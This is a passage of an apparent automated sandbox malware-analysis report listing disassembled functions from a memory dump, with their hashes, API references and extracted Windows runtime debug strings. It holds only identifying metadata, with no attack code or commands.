                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: d2901e8db2a4cc80c76c4061776e6239edd8ee7a2620167fd1e07704b048d9b7
                                                • Instruction ID: 40d832e4bdc82dd54d7acb402d48a98251a82c5184a1f748a25ba4b341b63b00
                                                • Opcode Fuzzy Hash: d2901e8db2a4cc80c76c4061776e6239edd8ee7a2620167fd1e07704b048d9b7
                                                • Instruction Fuzzy Hash: 47E1AE306047419FEB25EF28C894B2ABBE0BB94314F140A1EF5A59B3F1D774D94ACB52
                                                Function 0149B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014D728C
                                                Strings
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 014D7294
                                                • RTL: Re-Waiting, xrefs: 014D72C1
                                                • RTL: Resource at %p, xrefs: 014D72A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 0e80492b66e8d8def4cda4d2cad81336b7e9d1be75971ca97b4ccd1330600b8b
                                                • Instruction ID: 71d3fd69455e73249e7976e36cd806d5712e219e6c0d196c36404fbc18680974
                                                • Opcode Fuzzy Hash: 0e80492b66e8d8def4cda4d2cad81336b7e9d1be75971ca97b4ccd1330600b8b
                                                • Instruction Fuzzy Hash: CA41E131600242ABDB21DF29DC41F6ABBA5FBA4715F10062FF955AB360DB31F81687D1
                                                Function 01512300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: bd76e3f2cba962ecd48bdf1e8c292bb225366d852373681929569bc901e07c24
                                                • Instruction ID: e214209e07a30a5325632924ce7421578364effcc35c6ebd8fa4a372d8a06342
                                                • Opcode Fuzzy Hash: bd76e3f2cba962ecd48bdf1e8c292bb225366d852373681929569bc901e07c24
                                                • Instruction Fuzzy Hash: 8A318672A002199FDB21DF2DCC40BEEB7F8FB54650F95455AE949E7204EB30EA548BA0
                                                Function 01469126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: e2ebbe01d13f050b94f3e5bc1ba1681ba67e40acbaf8dd72d794407fe656ff9d
                                                • Instruction ID: a7170047f3e59c477012b1ad0b914311e9f7f6a4dfee6ebf2f2e477aa9a63057
                                                • Opcode Fuzzy Hash: e2ebbe01d13f050b94f3e5bc1ba1681ba67e40acbaf8dd72d794407fe656ff9d
                                                • Instruction Fuzzy Hash: 9D813C75D00269DBDB31CB54CC44BEEBAB8AB18714F0441EBEA19B7250D7B09E85CF60
                                                Function 014ECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                Download Yara Rule
                                                APIs
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 014ECFBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: CallFilterFunc@8
                                                • String ID: @$@4Cw@4Cw
                                                • API String ID: 4062629308-3101775584
                                                • Opcode ID: 7c7dcda6381686ca62b411e0ab726d7dbd1b8e080d1767dd2ecc90a483f84f02
                                                • Instruction ID: c91ef5d3ff6a5d5e26fc42608a9efff9e5272a269eb60e1b09c536c0606dfc06
                                                • Opcode Fuzzy Hash: 7c7dcda6381686ca62b411e0ab726d7dbd1b8e080d1767dd2ecc90a483f84f02
                                                • Instruction Fuzzy Hash: 5C419AB1D00215DFDB219FAAC894AAEBBF8FF65B54F04402FE914DB264E7708801DB61